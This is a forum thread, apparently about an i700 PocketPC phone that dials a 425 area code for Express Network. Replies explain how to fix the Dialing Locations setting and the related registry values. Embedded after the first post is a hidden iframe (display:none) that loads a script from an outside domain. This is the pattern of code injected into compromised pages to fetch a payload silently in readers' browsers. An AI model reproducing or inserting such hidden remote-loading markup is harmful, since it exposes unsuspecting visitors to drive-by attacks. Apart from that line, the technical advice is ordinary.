My phone is set to dial +1 (425) #777 for EN - But I'm (804)

I just noticed that my phone dials +1 (425) #777 when connecting to Express Network. I'm in area code 804. I tried dialing the number that causes the phone to be reprogrammed, but it stayed the same.

Should I edit and change this setting. What do your i700's dial for EN?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is an unfortunate side affect of all PocketPC's.. The default area code in Dialing Locations is set to 425. You can correct this by tapping Start -> Settings -> Connections, then tap on the Connections icon then the Dialing Locations tab.

Under the Local Settings heading, locate the 425 area code and replace it with yours.

THEN.. Tap the Dialing Patterns button and change all three fields to G only (you'll never need an area code with EN no matter where you are). You're done after that. Don't worry though, adding the area code to the number dialing EN isn't hurting your connection at all, nor would it cost $$ since long distance is free on the AC plans.

It's stored in HKLM\SOFTWARE\Microsoft\AddrBook\Default_Area which is of type REG_SZ and set to 425.

Changing it does not require a reset.

From my own customize.sa.cab in extended rom:

[HKEY_LOCAL_MACHINE\SOFTWARE\APPS\Microsoft Application Installer]
"nDynamicDelete"=dword:0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AddrBook]
"Default_Area"="520"

[HKEY_LOCAL_MACHINE\Control_Panel\Phone]
"Flags2"=dword:10
